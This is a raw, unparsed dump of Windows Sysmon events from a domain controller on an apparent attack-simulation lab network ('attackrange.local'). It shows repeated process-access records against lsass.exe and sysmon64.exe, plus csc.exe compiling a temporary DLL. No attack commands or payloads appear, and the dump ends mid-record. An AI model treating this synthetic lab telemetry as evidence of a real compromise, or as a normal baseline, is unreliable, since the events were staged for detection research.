15:52:08.670{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003193Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003192Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.654{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003191Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.638{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003190Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.638{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003189Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.638{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003188Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:08.278{D28789B6-7CA8-5FA1-9700-000000008801}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\j4qugwyi.dll2020-11-03 15:52:07.996 10341000x80000000000000003187Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.262{D28789B6-7CA7-5FA1-9200-000000008801}5048668C:\Windows\system32\conhost.exe{D28789B6-7CA8-5FA1-9800-000000008801}4956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003186Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.262{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003185Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.262{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CA8-5FA1-9800-000000008801}4956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003184Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.262{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003183Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.262{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003182Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.262{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003181Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.262{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003180Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.262{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003179Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.262{D28789B6-7CA8-5FA1-9700-000000008801}50445096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7CA8-5FA1-9800-000000008801}4956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003178Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.262{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003177Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.262{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003176Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.262{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003175Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.267{D28789B6-7CA8-5FA1-9800-000000008801}4956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES24E8.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC8CCD4D5F3C47465F9564AC136ED67B13.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA7-5FA1-A343-060000000000}0x643a30HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7CA8-5FA1-9700-000000008801}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\j4qugwyi.cmdline" 10341000x80000000000000003174Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.074{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003173Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.074{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003172Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.074{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003171Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.043{D28789B6-7CA7-5FA1-9200-000000008801}5048668C:\Windows\system32\conhost.exe{D28789B6-7CA8-5FA1-9700-000000008801}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003170Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.043{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003169Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 